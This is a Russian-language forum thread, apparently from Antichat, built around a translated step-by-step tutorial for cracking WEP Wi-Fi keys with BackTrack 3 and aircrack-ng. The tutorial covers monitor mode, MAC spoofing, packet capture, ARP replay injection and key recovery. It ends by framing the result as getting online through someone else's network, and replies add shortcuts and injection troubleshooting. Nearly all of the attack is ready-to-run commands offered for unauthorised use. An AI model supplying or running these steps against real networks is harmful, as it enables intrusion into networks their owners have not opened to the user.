Для взлома WEP ключа нам понадобится: - BactTrack 3 - подходящий wifi адаптер(список). - Точка доступа с WEP-шифрованием - Базовое знание терминов .::Подготовка WIFI адаптера::. Способ #1: Набираем в консоли: Code: iwconfig . В ответ будет что-то вроде: Code: bt ~ # iwconfig lo no wireless extensions. wifi0 no wireless extensions. ath0 IEEE 802.11g ESSID:"homenet" Nickname:"" [color=red]Mode:Managed[/color] Frequency:2.437 GHz Access Point: 00:17:9A:26:8C:0E Bit Rate:18 Mb/s Tx-Power:15 dBm Sensitivity=1/1 Retryff RTS thrff Fragment thrff Encryption key:1234-5678-99 Security modepen Power Managementff Link Quality=18/70 Signal level=-78 dBm Noise level=-96 dBm Rx invalid nwid:5601 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 Как видим, карточка находится в управляемом режиме - чтобы взломать сеть нужно перевести её в режим мониторинга. Для этого пишем: Code: wlanconfig ath1 create wlandev wifi0 wlanmode monitor Всё, осталось сменить mac-адрес и можно переходить к следующему этапу, подставляя вместо [device] и [interface] ath1. Способ #2: Code: iwconfig Выдаст вам имя интерфейса беспроводного адаптера. Затем нужно остановить адаптер: Code: airmon-ng stop [device] Затем: Code: ifconfig down [interface] Теперь нужно поменять MAC адрес адаптера: Code: macchanger --mac 00:11:22:33:44:66 [device] Настало время запустить адаптер в режиме мониторинга: Code: airmon-ng start [device] .::Атакуем цель::. Ищем сеть с WEP шифрованием командой: Code: airodump-ng [device] Запишите MAC адрес сети(BSSID) ключ которой хотите найти , канал (CH) и имя (ESSID). Теперь нужно начинать собирать данные с точки доступа сети для атаки: Code: airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device] Эта команда выведет данные в файл network.out. Затем нужно скормить этот файл другой программе и золотой ключик наш . Откройте другую консоль (оставив эту работать). Теперь нужно сгенерить поддельные пакеты чтобы заставить точку доступа передавать больше данных необходимых для поиска ключа. Протестируйте точку доступа следующей командой: Code: aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device] Если всё прошло успешно можно начинать генерировать множество пакетов чтобы взломать WEP ключ: Code: aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device] Это заставит точку доступа передать множество пакетов которые мы будем использовать для взлома ключа. Переключитесь на airodump-ng работающий в другой консоли и вы увидите как число "data" пакетов растет со временем. После того как количество пакетов достигнет 10000-20000 (чем больше пакетов тем быстрее будет найден ключ) можно запускать aircrack. Если не получается получить от точки доступа пакеты вышеописанным способом попробуйте ввести: Code: aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device] Теперь, когда вы собрали достаточное количество пакетов для взлома можно приступать собственно к взлому: Code: aircrack-ng -n 128 -b [bssid] [filename]-01.cap -n указывает на то что ключ 128ми битный (может быть 64 битным). Всё, ключ найден можно выходить в интернет с помощью чужой сети Источник Переведено и дополнено jawbreaker специально для Античат.ру!
на самом деле я вызываю aircrack-ng *.cap и не парюсь, да и для вепа можно параметр -i поставить, тогда собирать будет только ключи инициализации (IVs) файлы тогда будут сохраняться как *.ivs
Люди явно отстают от жизни))) ставим spoonwep2 и весь взлом упрощается до неузноваемости) пару кликов и через 5 минут у тебя уже ключик) конечно иногда попадаются такие сети где без рук не обойтись, но это редкость))
У меня тоже самое с Orient XG701A. Правда иногда ловит ACKи , но не ловит ARP запросы. У АР, видимо, сигнал мощнее вот она и ловится со своими ACKами. А ARP-запросы ассоциированного клиента похоже просто не ловятся из-за слабого сигнала => поэтому и идет лесом весь инъект. Я, правда, не уверен. Может у кого еще есть мысли?
karlsn перед тем как проводить атаку -3 или -2 сначала нужно что бы атка -1 прошла успешно Code: aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device] на твоем последнем скрине видно что под AUTH нет ничего а должно стоять OPN в случае успешной аутентификации , тогда можно и генерить пакеты я тоже использую карту Edimax EW-7318USG , с атакой -1 тоже траблы ... хотя наверно дело не в карте а в АРах ... так как некоторые точки доступа открываются с первого раза , некоторые иногда , а иные никак не хотят .
Да, у меня также! надо аутиентифицироваться (-1) а только потом генерить пакеты, иначе толку от них 0 у меня точка ловится с wep и никак не хочет открываться (-1) хотя тест inj (-9) отличный! а другие dlink очень хорошо открываются!(-1) зависит от ТД!
хм, столкнулся со странной ситуацией: вместо essid строчка вида <length: 9> есть мысли по этому поводу?
(Моё предположение) Что это точки со старыми прошивками, или что-то в этом роде. Т.е. на точке стоит "Hide", но длина имени передается. По идее, ничем не отличается от обычной 0, только с длиной. Скорее всего сделано для того (отображение), чтобы можно было подбирать ссид, при необходимости.
Это тип настройки, в настройках при скрытии можно указать скрывать длину essid или не скрывать. Это писалось в Xakep Спец (номер про беспроводные сети)
EW-7318USG bt ~ # wlanconfig ath1 create wlandev wifi0 wlanmode monitor wlanconfig: ioctl: no such device Что ему не понравилось?